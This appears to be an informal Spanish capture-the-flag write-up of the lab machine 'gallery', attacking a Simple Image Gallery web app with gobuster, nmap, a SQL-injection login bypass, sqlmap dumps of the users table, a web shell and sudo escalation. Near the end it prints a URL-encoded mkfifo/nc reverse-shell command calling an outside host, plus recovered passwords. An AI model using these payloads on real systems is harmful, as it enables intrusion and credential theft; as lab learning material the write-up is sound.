mquina gallery

con gobuster encontramos solo el directorio /gallery el cual nos lleva a un login
el resultado de un segundo fuzz al directorio /gallery da bastante resultados

===============================================================
2023/07/20 01:34:40 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/albums               (Status: 301) [Size: 323] [--> http://10.10.236.217/gallery/albums/]
/archives             (Status: 301) [Size: 325] [--> http://10.10.236.217/gallery/archives/]
/assets               (Status: 301) [Size: 323] [--> http://10.10.236.217/gallery/assets/]
/build                (Status: 301) [Size: 322] [--> http://10.10.236.217/gallery/build/]
/classes              (Status: 301) [Size: 324] [--> http://10.10.236.217/gallery/classes/]
/database             (Status: 301) [Size: 325] [--> http://10.10.236.217/gallery/database/]
/dist                 (Status: 301) [Size: 321] [--> http://10.10.236.217/gallery/dist/]
/inc                  (Status: 301) [Size: 320] [--> http://10.10.236.217/gallery/inc/]
/index.php            (Status: 200) [Size: 16950]
/plugins              (Status: 301) [Size: 324] [--> http://10.10.236.217/gallery/plugins/]
/report               (Status: 301) [Size: 323] [--> http://10.10.236.217/gallery/report/]
/uploads              (Status: 301) [Size: 324] [--> http://10.10.236.217/gallery/uploads/]
/user                 (Status: 301) [Size: 321] [--> http://10.10.236.217/gallery/user/]
Progress: 4614 / 4615 (99.98%)
===============================================================
2023/07/20 01:37:37 Finished
===============================================================

con nmap -sC -sV no muestra
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Simple Image Gallery System
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set

exploits:
https://www.exploit-db.com/exploits/50214
Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)              | php/webapps/50214.py
Simple Image Gallery System 1.0 - 'id' SQL Injection                                  | php/webapps/50198.txt

en el login con
	admin' #
logramos ingresar como admins

usamos el sqlmap

nos da esto:

sqlmap identified the following injection point(s) with a total of 340 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4779=4779 AND 'nZam'='nZam

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 3327 FROM (SELECT(SLEEP(5)))vPDe) AND 'GyCx'='GyCx

el resto del resultado se guardo en 
/root/.local/share/sqlmap/output/10.10.236.217

resultado de buscar las tablas en la base de datos gallery_db

Database: gallery_db
[4 tables]
+-------------+
| album_list  |
| images      |
| system_info |
| users       |
+-------------+

resultado de buscar en la tabla users

Database: gallery_db
Table: users
[10 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| avatar       | text         |
| date_added   | datetime     |
| date_updated | datetime     |
| firstname    | varchar(250) |
| id           | int(50)      |
| last_login   | datetime     |
| lastname     | varchar(250) |
| password     | text         |
| type         | tinyint(1)   |
| username     | text         |
+--------------+--------------+

resultado de la busqueda de columnas en la tabla user
Database: gallery_db
Table: users
[1 entry]
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
| 1  | admin    | a228b12a08b6527e7978cbe5d914531c |
+----+----------+----------------------------------+

secuencia de todos los comandos
 1015  sqlmap -r test.req --dbs
 1016  sqlmap -u http://10.10.28.246:80/gallery/albums/view_img.php?id=6 --tables -D gallery_db
 1017  sqlmap -u http://10.10.28.246:80/gallery/albums/view_img.php?id=6 --columns -D gallery_db -T users
 1018  sqlmap -u http://10.10.28.246:80/gallery/albums/view_img.php?id=6 --dump -D gallery -T users
 1019  sqlmap -u http://10.10.28.246:80/gallery/albums/view_img.php?id=6 --dump -D gallery -T users -C id,username,password
 1020  sqlmap -u http://10.10.28.246:80/gallery/albums/view_img.php?id=6 --dump -D gallery_db -T users -C id,username,password


una vez que obtenemos rce por medio de 
el exploit me devuelve:
http://10.10.28.246/gallery/uploads/1689897240_TagodehsokghszhcmdgLetta.php?cmd=whoami
como podemos ejecutar comando obtenemos una rce por este medio, tenemos que encodearlo a url
lo cual nos resulta en
http://10.10.28.246/gallery/uploads/1689897240_TagodehsokghszhcmdgLetta.php?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2%3E%261|nc+10.8.98.229+1234+%3E/tmp/f

en el usuario mike esta la user flag la cual no podemos ver por permisos
en un backups del usuario mike encontramos esto del .bash_history 
sudo -lb3stpassw0rdbr0xx

hasta aca llegamos por el momento, me quede sin tiempo en la maquina

investigando en la carpeta backups de mike
accaunts.txt
	Spotify : mike@gmail.com:mycat666
	Netflix : mike@gmail.com:123456789pass
	TryHackme: mike:darkhacker123

sudo -lb3stpassw0rdbr0xx
clear
sudo -l

cambiamos la terminal, de este modo no podemos logear como mike

podemos ejecutar sudo /opt/rootkit.sh
tenemos que cambiar de tty y exportar una terminal
una vez echo esto ejecutamos un comando en el nano y nos deja como root y podemos obtener la ultima flag

